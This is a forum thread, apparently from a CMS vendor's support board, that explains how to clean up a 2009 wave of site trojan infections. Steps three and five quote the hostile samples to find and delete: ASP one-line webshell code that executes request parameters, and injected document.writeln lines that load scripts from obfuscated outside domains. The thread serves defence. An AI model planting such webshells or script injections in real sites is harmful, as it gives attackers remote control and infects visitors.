8月24日至26日陆续被挂马的用户查看本贴进行解决！

admin

8月24日起，陆续有用户站点被挂马，经嘉缘工程师们的昼夜努力，最终确定，这次挂马攻击是由江西的一名黑客所为，嘉缘已向公安机关报案，网警已介入调查。

现就有关紧急解决办法发布如下：
1.嘉缘商业用户发现有挂马的站点请尽快与嘉缘客服人员联系，嘉缘已安排专门的技术工程师24小时不间断轮班为商业用户检查并清理站点上的木马。
2.由于本次受影响的站点众多，嘉缘人力有限，免费用户嘉缘不提供清马检查等技术服务，望谅解！
3.有一定技术基础、熟悉嘉缘系统文件目录及熟悉html的所有用户注意，在没有得到官方技术支持的情况下，请按照以下办法自行先行解决，如遇到问题可在论坛寻求帮助。
4.强烈谴责这些没有良知、没有公德心，所谓黑客的人。
5.感谢长期支持嘉缘的朋友们，嘉缘的发展离不开各位朋友的支持，我们将一如既往的为用户提供更好的技术服务，再次感谢！

解决办法：
第一步：修改后台路径，凡是被挂马的站点必须修改后台路径，修改目录名称后在后台网站配置里边修改对应的目录名称；
第二步：修改所有管理员的密码，密码由字母大小写特殊符合及数字不规则排列组成，密码长度最好为12位以上；
第三步：打开（8月24日）的站点日志，查找“59.55.175.235”、“59.55.171.180”，查找的结果会出现类似
2009-08-24 10:25:56 W3SVC887146513 220.187.26.66 POST /Admin/Hr/bottum.asp - 80 - 59.55.175.235
在网站空间里找出对应的文件，用记事本打开查看代码，如果文件代码类似下边这样的，那么就是木马文件，立即删除；
<%set ms = server.CreateObject(\"MSScriptControl.ScriptControl.1\")
ms.Language=\"VBScript\"
ms.AddObject \"Response\", Response
ms.AddObject \"request\", request
ms.AddObject \"session\", session
ms.AddObject \"server\", server
ms.AddObject \"application\", application
ms.ExecuteStatement (\"ex\";\"ecute(request(chr(35)))\")%>

<%execute request(\"#\")%>
第四步：重新生成模版，进入后台风格模版---模版方案管理---点网站的模版方案生成，然后在系统相关---清理系统缓存，进行清理模版缓存，如果站点开启了生成静态功能，请随后重新生成所有需要生成的文件；
第五步：清理ASP、JS中的木马代码，打开JS目录里边的文件，查看是否有document.writeln('<script type=\"text/javascript\" language=\"JavaScript\" src=\"http://c%30812.2288.org\" id=\"seraph4script2429\"  ><\/script>');
document.writeln('<script id=\"seraph3script302\" type=\"text/javascript\" src=\"http://0810.6600.o%72g\" language=\"JavaScript\"  ><\/script>');这个代码，有的话，删除该字符所在的整行代码，打开站点首页index.asp文件，查看最后一行代码如果是</script>结束的，删除%>之后的所有代码。
第六步：打开网站，浏览各频道页面及部分内容页，看是否还提示有木马提示，如果有提示，说明没有清理完整，可以通过查看源代码来找到被挂的代码，如果页面上没有，应该在JS里边，认真查看所有JS并清理。

清理的过程中如遇到遇到请跟本贴提出，禁止另开新帖，新开帖不予回复！

感谢用户chentaonc 提供详细的被修改文件列表，请对照检查自己网站的对应文件!
http://bbs.yjys.net/thread-21340-1-1.html

admin

二楼将陆续发布更有效的解决办法，以下方法的前提是必须先修改后台管理员密码及路径，此次攻击并非漏洞直接所致，木马不清理，挂马将会继续，所以一定要注意，清理所有木马文件。
方法一：使用FTP下载全站文件，无法下载的文件为木马文件，删除即可。
部分用户站点内的木马文件使用FTP无法正常下载，这个根据空间而定，不是全部都这种情况，站点文件全部可以下载不代表里边没有木马。如下图

a.jpg

无法下载的文件，这些文件在FTP里边部分空间是无法删除的，请联系空间服务商进行删除，只要有一个木马没有被删除，网站继续会被挂马。
FTP无法删除木马的空间，空间服务商可能在空间里边可以搜索到但是看不到这些木马文件，请他们设置文件夹选项，如下图

b.jpg

去掉“隐藏受保护的操作系统文件”前的勾，这样就可以看到木马文件，删除掉即可。
然后挨个清理站点文件上的代码，主要影响的文件有js文件、index.asp文件、模版文件、生成的HTML文件，模版文件请登录后台“模版方案管理页面”，对应方案点击“生成”，提示生成成功后，进入“系统相关----清理系统缓存”。生成的HTML文件不用清理，可以使用后台的生成功能，重新生成文件即可。
方法二：打包下载全站文件，通过文件修改时间查找木马文件，删除空间里的木马即可。独立主机用户可以在服务器上直接在站点目录下查找24号到现在被修改过的所有文件，主要检查js文件、ASP文件以及help开头的图片文件。挨个打开清理木马代码，如果为木马文件的直接删除。T_开头的文件为模版文件，使用方法一里边的办法重新生成即可，html目录下的所有html文件不用检查，直接生成即可。
虚拟主机用户，最好请空间服务商协助打包整站文件，然后下载压缩包后，在本地按照独立主机用户的方法进行检查，切忌不要只删除本地文件里边的木马，一定要删除空间里边的对应木马。
方法三：按照方法一、二查找到木马文件后直接删除，然后用备份程序进行覆盖
如果站点文件在24日前有备份，那么可以使用此方法，前提是要清理所有木马文件，清理木马文件后使用备份的文件进行覆盖。
方法四：联系嘉缘客服人员购买技术服务，由嘉缘技术人员来为您及时清理木马并检查站点安全。
商业用户我们提供及时的木马清理服务，此次挂马的免费用户比较多，技术人员不能一一帮助清理，只能免费提供最有效的解决办法，如需要技术人员人工清理木马请联系客服人员。

admin

1.回复4楼：关闭写入权限可能导致站点部分功能无法运行，可以防止挂马。
2.回复20楼：请检查根目录下inc目录里的Keyboard.js文件。

350701030

我的24号被挂现在关闭了写入权限，这样应该不会再被挂吧？

lovematador

谢谢管理员发表的解决办法,可是没有分析出漏洞所在,那样还没有从根本上解决问题,一旦被人重新发现,还是会殃及池鱼,期待最终的解决办法~~~~

xxx9956

改了后台目录就没事了吧？好像被挂马的都是没有改后台目录的

chentaonc

速度出补丁

pan888

盼盼解答很耐心，非常感谢！

jeangone

非常感谢，期待能有 补丁出现。

eivac

等待补丁出现...